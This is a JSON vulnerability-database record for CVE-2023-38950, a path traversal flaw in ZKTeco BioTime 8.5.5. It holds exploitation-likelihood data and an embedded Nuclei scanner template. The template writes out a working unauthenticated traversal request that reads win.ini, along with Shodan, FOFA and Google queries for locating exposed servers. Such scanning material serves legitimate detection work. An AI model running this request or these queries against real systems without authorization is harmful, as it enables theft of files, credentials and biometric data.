{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-38950/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-38950/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-38950/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-38950/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-38950/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-38950"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-38950"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": true
    },
    "epss": {
      "epss": 0.84702,
      "kev": true,
      "percentile": 0.99696
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2023/CVE-2023-38950.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2023-38950\n\ninfo:\n  name: ZKTeco BioTime v8.5.5 - Path Traversal\n  author: iamnoooob,pdresearch\n  severity: high\n  description: |\n    A path traversal vulnerability in the iclock API of ZKTeco BioTime v8.5.5 allows unauthenticated attackers to read arbitrary files via supplying a crafted payload.\n  impact: |\n    Unauthenticated attackers can read arbitrary files from the server through path traversal in the iclock API url parameter, potentially exposing employee biometric data, attendance records, and system credentials.\n  remediation: |\n    Update ZKTeco BioTime to a version newer than 8.5.5 that validates file paths in the iclock API and restricts access to authorized files only.\n  reference:\n    - https://github.com/advisories/GHSA-4m8x-4g54-h49v\n    - http://zkteco.com\n    - https://claroty.com/team82/disclosure-dashboard/cve-2023-38950\n    - https://www.fortinet.com/content/dam/fortinet/assets/reports/report-incident-response-middle-east.pdf\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-38950\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-38950\n    cwe-id: CWE-22\n    epss-score: 0.84702\n    epss-percentile: 0.99696\n    cpe: cpe:2.3:a:zkteco:biotime:8.5.5:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: zkteco\n    product: biotime\n    shodan-query: http.title:\"biotime\"\n    fofa-query: title=\"biotime\"\n    google-query: intitle:\"biotime\"\n  tags: cve,cve2023,zkteco,biotime,lfr,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /iclock/file?url=/../../../../../../../../../windows/win.ini HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(header, \"text/plain\")'\n          - 'contains_all(base64_decode(body), \"; for 16-bit app support\" ,\"[extensions]\")'\n        condition: and\n# digest: 4a0a00473045022100a5a0fa568b5122c031e361bc3d3a5e4abed343e387f96ca9e0b4d962f0e33348022039ef5d52ab6fb5f26bbb747d569664aa233336100104767173533b501f6f619a:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2023-38950"
}